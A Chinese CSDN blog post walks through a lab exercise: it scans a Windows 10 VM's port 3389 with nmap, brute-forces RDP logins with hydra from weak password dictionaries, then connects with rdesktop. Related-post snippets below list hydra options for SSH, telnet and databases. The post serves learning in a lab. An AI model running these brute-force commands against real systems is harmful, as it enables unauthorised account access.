九头蛇3389远程爆破

最新推荐文章于 2024-07-31 21:07:43 发布
最新推荐文章于 2024-07-31 21:07:43 发布
阅读量6.7k 收藏 25
点赞数 5
文章标签: 安全 linux web安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DANNY1DXY/article/details/125283773
版权

1.初学KALI hydra(海德拉)。

实验环境:VM16,虚拟机两台,Windows10系统,KALI系统,用nmap查看目标端口是否开放。

2.在KALI虚拟机上面使用命令nmap查看WIN10的3389端口是否打开。

3.在KALI虚拟机上面建立用户名和密码两个弱口令的文本文件。

4.使用海德拉工具Hydra(海德拉)工具进行爆破,字典的制作可以用工具也可以自己手动输入常见弱口令
命令为:hydra IP地址 rdp -L 用户字典 -P 密码字典 -V
hydra 192.168.199.130 rdp -L user.txt -P passwd.txt -V
rdp 即RDP协议
-L是账号字典
-P是指定密码字典
-V是用来显示爆破的详细过程
字典一般要把路径加上不过要是能在相对路径下补全出来就不用                                                      接下来就是爆破过程 

此时我们可以发现RDP协议,用户名,密码都被破解出来。 

5.当我们有了账号名和密码的时候就可以远程连接WIN10了。用Kali登录3389来验证,命令为:redesktop -f -a 16 IP地址:3389rdesktop -f -a 16 192.168.210.130:3389,第一次会提示你yes/no不用管它直接yes。

这里我出现了一个问题:

解决办法可以去WIN10虚拟机上把仅运行使用网络级别身份验证的远程桌面的计算机连接这一项关掉。

6.让我们再来试一次:rdesktop -f -a 16 192.168.210.130:3389,最后成功远程WIN10系统。

 

 

 

 

 

DANNY1DXY
关注
  • 5
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
记录一次 hydra爆破虚拟机win10 3389端口_hydra 3389 端口修改
fdsgdsgdfw的博客
04-16 815
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。这里设置目标的IP地址,爆破端口,还有协议并设置输出显示。
应用协议安全:Hydra 端口爆破工具.(九头
Karka_的博客
06-29 892
这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!(2)实战:爆破 远程桌面 RDP.( 3389 端口 )(10)实战:爆破 PgSQL数据库( 5432 端口 )(6)实战:爆破 MSSQL数据库( 1433 端口 )(7)实战:爆破 MySQL数据库( 3306 端口 )(9)实战:爆破 Redis数据库( 6379 端口 )(1)实战:爆破 SSH 协议.( 22 端口 )④50份安全攻防面试指南。
九头简单介绍
2301_80453793的博客
05-28 315
R 恢复爆破(如果破解中断了,下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。Hydra也叫九头,是一款开源的暴力破解工具,集成在kali当中。-e ns 额外的选项,n:空密码试探,s:使用指定账户和密码试探。将事先准备好的弱口令字典导入Kali中,并进入导入的目录下。由于mysql密码是默认没有的,所以需要用此语句设置一个密码。-f 找到第一对登录名或者密码的时候中止破解。-M 指定目标ip列表文件,批量破解。-p 小写,用于指定密码破解。
九头(hydra)密码爆破工具
m0_74025111的博客
10-15 308
#$%^&()-= -t 8 192.168.1.1 http-get / -l admin 为尝试破解的用户名。# -x 6:10:1a. 表示枚举的密码由 数字、小写字母和单字符’.'等等组成,长度为 6 - 10 位。hydra ip地址 telnet -l 用户字典.txt -P 密码字典.txt -t 32 -s 23 -e ns -f -V。因为字典数量比较少,我们可以轻易的破解成功,但是实际情况下,我们可能需要很久。HYDRA是著名组织THC的一款开源的暴力破解密码工具,其功能非常强大的。
九头--hydra爆破密码实现远程连接登录
Aisen_bear的博客
10-03 4509
Hydra是一个相当强大的暴力密码破解工具。该工具支持几乎所有协议的在线密码破解,如FTP、HTTP、HTTPS、MySQL、MS SQL、Oracle、Cisco、IMAP和VNC等。其密码能否被破解,关键在于字典是否足够强大。下面演示一下hydra的简单实用。 准备环节 1台centos虚拟机:IP192.168.xx.xx 账号root 密码1234(靶机) 1台kali虚拟机 (主机) 一份爆破用字典(账户爆破字典、密码爆破字典) 参数简介 hydra的主要选项 -R 修复以前使用.
Hydra九头爆破
weixin_55553136的博客
05-21 1371
④检查是否存在OpenSSH服务器和OpenSSH客户端,不存在的话,点击添加功能,找到这俩,然后等待安装(大概需要5分钟),注:两个都需要安装,缺一不可。这里 -l 指定了用户名(如果是字典攻击,则使用 -L),-P 指定了密码文件,-t 指定了并发线程数,target 是目标服务器的地址。-p 指定了密码,-e 指定了加密类型(ns 代表无密码或SSH的空密码),-s 指定了端口号。-M 指定了模块文件,-m 指定了模块中的哪个嗅探模式使用,-o 指定了输出文件。-T 后面跟的是时间间隔(秒)。
hydra(九头)破解rdp口令,远程登录靶机
weixin_61970418的博客
03-30 493
使用hydra(九头)暴力破解rdp密码
Hydra(九头)密码破解工具的详细使用教程
黄乔国PHP
07-16 5353
Hydra是⼀款开源的暴⼒密码pojie⼯具,⽀持多种协议密码的破译。可以对多种服务的账号和密码进行爆破,包括 数据库、SSH、FTP 等服务,在 Kali Linux 中自带 Hydra。有了这个工具就可以很方便的对密码进行破解。其简单的使用参数如下:完整参数可以使用-h来查看:支持爆破的服务也很多:如http,ftp,redis, mysql,mssql, mongod等等。
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1356
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
Linux玩转指南
qq_43535970的博客
07-25 1093
Linux是一个类Unix操作系统,最初由Linus Torvalds于1991年发布。它是基于开源的内核,并结合了大量的开源软件,形成了完整的操作系统。Linux的设计理念强调开源和自由,使得它在全球范围内得到广泛应用,从个人电脑到服务器、嵌入式系统,甚至超级计算机。
Linux初学基本命令
yuan20010401的博客
07-25 986
1、rm 文件名称 删除多个文件多个目录需要用空格 删除根目录(rm -rf /*)1、touch 文件名字 用于linux创建文件 创建多个目录需要用空格隔开。2、mkdir 目录名称 用于创建文件夹 创建多个嵌套文件夹需要用/隔开。1、cp 当前文件 其他目录名称 拷贝文件夹需要在最后 -r。退出不保存时按Esc+:q!1、ls 查看当前目录下面的文件或者文件夹。2、more 文件名称 查看文件更多内容。1、mv 原文件路径 目标文件路径。退出保存时按Esc + :wq。
60个常见的 Linux 指令
yatingliu的博客
07-25 2053
常见 60 个Linux指令学习笔记
web安全基础学习
最新发布
m0_71332744的博客
07-31 249
记录学习的原理,少有实操持续更新
网络安全之扫描探测阶段攻防手段(二)
子非渔
07-24 811
扫描探测阶段是攻击者对目标网络进行深入了解的关键步骤,同时也是防御者识别潜在威胁和加强安全防护的机会。
网络安全相关竞赛比赛
黑战士的博客
07-18 1474
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
由“微软蓝屏”事件引发的对网络安全与系统稳定性的思考
qq_37524903的博客
07-23 947
近日,一场由微软视窗系统软件更新引发的全球性“微软蓝屏”事件,震动了整个科技领域。它不仅成为热点新闻,更是对全球 IT 基础设施韧性与安全性的一次深度检验。此次事件的源头是美国电脑安全技术公司“众击”提供的一个存在“缺陷”的软件更新,这个看似微不足道的问题,却如同一颗隐形炸弹,在全球范围内瞬间引爆。近 850 万台设备因此遭遇故障,波及航空、医疗、传媒等众多关键行业。其中,仅在美国就导致超过 2.3 万架次航班延误,其影响之广,令人瞠目结舌。
3389端口爆破字典
09-23
3389端口爆破字典可以使用Hydra工具进行制作,你可以手动输入常见的弱口令,也可以使用工具生成字典文件。以下是使用Hydra工具进行3389端口爆破的示例命令: hydra IP地址 rdp -L 用户字典 -P 密码字典 -V 例如: hydra 192.168.1.12 rdp -L user.txt -P passwd.txt -V 其中,IP地址是目标主机的IP地址,用户字典和密码字典是存储用户名和密码的字典文件路径,-V参数用于显示爆破的详细过程。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值